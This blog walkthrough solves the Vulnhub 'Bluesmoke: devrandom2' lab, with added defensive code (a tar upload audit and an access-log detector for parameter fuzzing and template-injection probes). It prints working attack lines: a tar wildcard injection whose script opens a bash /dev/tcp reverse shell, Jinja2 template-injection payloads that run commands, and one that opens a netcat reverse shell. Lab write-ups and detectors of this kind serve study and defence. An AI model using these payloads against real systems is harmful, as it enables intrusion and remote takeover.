Windy's little blog

All the odds and ends of daily life, and I like CTF.

Vulnhub Bluesmoke: devrandom2 Walkthrough


https://www.vulnhub.com/entry/bluesmoke-devrandom2,678/


Scan all ports with Nmap.

nmap -sV -sC -p- -oN ports.log 192.168.56.100



Check port 80, it's a backup system.




We can only upload .zip or .tar files, and tar has a wildcard vulnerability. We create 3 files and pack them in a tar file.

echo '' > --checkpoint=1
echo '' > '--checkpoint-action=exec=sh p.sh'
echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.56.150/1234 0>&1'" > p.sh
tar -cvf p.tar ./--checkpoint=1 ./--checkpoint-action=exec=sh\ p.sh ./p.sh


Then we upload p.tar and listen on port 1234. About 1 minute later we get a reverse shell.
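The backup application could have refused this upload before the cron job ever ran tar over it. The following is an added example, not code from the walkthrough or from the target's backup system: an audit of an uploaded tar archive that flags member names beginning with '-' (which tar, when invoked with a shell wildcard, parses as options), plus absolute and '..' paths. The sample archive is constructed here to mirror the upload built above; its p.sh body is a placeholder.

```python
import io
import tarfile
from typing import Dict, Optional

# Server-side audit of an uploaded archive (added example, not part of the
# walkthrough or of the target's backup application). The backup job later runs
# tar over the extracted files with a shell wildcard, so any member whose name
# starts with '-' would be parsed by tar as an option; reject those at upload
# time, along with the usual absolute and '..' paths.


def _bare(name: str) -> str:
    """Strip a leading './' so './--checkpoint=1' and '--checkpoint=1' compare alike."""
    return name[2:] if name.startswith("./") else name


def member_is_suspicious(name: str) -> Optional[str]:
    """Return why a member name is unsafe, or None if it is acceptable."""
    bare = _bare(name)
    if bare.startswith("-"):
        return "option-like name"
    if bare.startswith("/"):
        return "absolute path"
    if ".." in bare.split("/"):
        return "path traversal"
    return None


def audit_tar(data: bytes) -> Dict[str, str]:
    """Map each unsafe member (normalised name) of a tar archive to the reason it was flagged."""
    findings: Dict[str, str] = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        for member in tf.getmembers():
            reason = member_is_suspicious(member.name)
            if reason is None and (member.issym() or member.islnk()):
                # a link whose target escapes the extraction root is the same hazard
                reason = member_is_suspicious(member.linkname)
            if reason:
                findings[_bare(member.name)] = reason
    return findings


def build_tar(files: Dict[str, bytes]) -> bytes:
    """Build a tar archive in memory; used here only to construct the sample."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tf.addfile(info, io.BytesIO(content))
    return buf.getvalue()


# Constructed sample shaped like the upload built above (the p.sh body is a
# placeholder, not the walkthrough's reverse-shell line).
SAMPLE_UPLOAD = build_tar({
    "./--checkpoint=1": b"\n",
    "./--checkpoint-action=exec=sh p.sh": b"\n",
    "./p.sh": b"# placeholder\n",
    "./notes.txt": b"harmless\n",
})

if __name__ == "__main__":
    for name, reason in audit_tar(SAMPLE_UPLOAD).items():
        print(f"REJECT {name!r}: {reason}")
```

The audit only flags the two option-like names; p.sh itself is an ordinary file and is not what makes the archive dangerous. The backup job would also be fixed on its own side by never passing a glob to tar (for example `tar -cf out.tar -C dir .`), which this check complements rather than replaces.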



Then we can upload id_rsa.pub and log in over SSH.

Upload pspy64, run it, and this time wait longer.

We find 'grep -q 1 /tmp/start', which looks like a trigger condition.




Create a file named "start" in /tmp with the content "1". Then run pspy64 again and wait.

echo 1 > /tmp/start



A new service is running. Let's check the ports again: a new port, 8787, is open.



Forward port 8787 over SSH and check the service.

ssh -L 8787:127.0.0.1:8787 backupper@192.168.56.98



Use wfuzz to check whether the site accepts any query parameters.

wfuzz -u 'http://127.0.0.1:8787/?FUZZ=id' -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 21



The value of "name" is displayed in the response.



And it has an SSTI vulnerability.



Let's try a longer SSTI payload.

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}



Now we can get a reverse shell as remnie.

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').system('nc 192.168.56.150 2234 -e /bin/bash')") }}{% endif %}{% endfor %}
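Both steps against port 8787 leave a clear trace in the web server's access log: one client cycling through a wordlist of parameter names, followed by values carrying template syntax and Python dunder attribute chains. The following is an added example, not code from the walkthrough or from the target application: a small detector over combined-format access log lines. The log lines are constructed here, with the wordlist burst, two probes on the reflected 'name' parameter, and one benign request from another address.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import parse_qsl, quote_plus, unquote_plus, urlsplit

# Detection over web-server access logs (added example, not from the walkthrough).
# Two behaviours seen above stand out in a log: one client trying a long list of
# query-parameter names (wfuzz with a wordlist), and parameter values that carry
# template syntax or Python dunder attribute chains (SSTI probing).

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
TEMPLATE_MARKERS = ("{{", "{%", "${")
DUNDER_RE = re.compile(r"__(class|base|mro|subclasses|globals|builtins|init)__")


def analyse_request(line: str) -> Optional[dict]:
    """Parse one combined-format log line; report its parameter names and SSTI-looking values."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    params = parse_qsl(parts.query, keep_blank_values=True)
    probes = []
    for key, value in params:
        # parse_qsl already decoded once; decoding again also catches double-encoded payloads
        decoded = unquote_plus(value)
        if any(marker in decoded for marker in TEMPLATE_MARKERS) or DUNDER_RE.search(decoded):
            probes.append(key)
    return {"ip": m.group("ip"), "path": parts.path, "params": [k for k, _ in params], "probes": probes}


def detect(lines: List[str], fuzz_threshold: int = 20) -> List[Tuple[str, str, object]]:
    """Return (alert_type, client_ip, detail) tuples for SSTI probes and parameter-name fuzzing."""
    names_by_ip: Dict[str, Set[str]] = defaultdict(set)
    alerts: List[Tuple[str, str, object]] = []
    for line in lines:
        info = analyse_request(line)
        if info is None:
            continue
        names_by_ip[info["ip"]].update(info["params"])
        for key in info["probes"]:
            alerts.append(("ssti_probe", info["ip"], key))
    for ip, names in names_by_ip.items():
        if len(names) >= fuzz_threshold:
            alerts.append(("param_fuzzing", ip, len(names)))
    return alerts


# Constructed sample log: a wordlist burst from one client, two SSTI probes on
# the reflected 'name' parameter, and a benign request from another address.
_WORDS = [
    "action", "admin", "api", "cmd", "config", "data", "debug", "exec", "file", "id",
    "input", "key", "lang", "mode", "page", "path", "query", "search", "test", "type",
    "url", "user", "view", "q",
]
_STAMP = "[10/Oct/2000:13:55:36 +0000]"
_PROBE_1 = quote_plus("{{7*7}}")
_PROBE_2 = quote_plus("{% for c in [].__class__.__base__.__subclasses__() %}{% endfor %}")
SAMPLE_LOG = [
    f'192.168.56.150 - - {_STAMP} "GET /?{w}=id HTTP/1.1" 200 21' for w in _WORDS
] + [
    f'192.168.56.150 - - {_STAMP} "GET /?name={_PROBE_1} HTTP/1.1" 200 23',
    f'192.168.56.150 - - {_STAMP} "GET /?name={_PROBE_2} HTTP/1.1" 200 21',
    f'10.0.0.7 - - {_STAMP} "GET /?name=alice HTTP/1.1" 200 26',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The fuzzing rule counts distinct parameter names per client rather than request volume, which is what separates a wordlist run from a busy but legitimate user; the threshold of 20 is an assumption to tune per site.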



Then in /home/remnie/scripts we find a strange server.conf.



Copy the encoded content into CyberChef and apply this recipe:

From Hexdump --> Find/Replace (space to '') --> From Binary --> From Hex --> From Base32 --> From Base64

Then we get the root credentials.



Finally we get root.

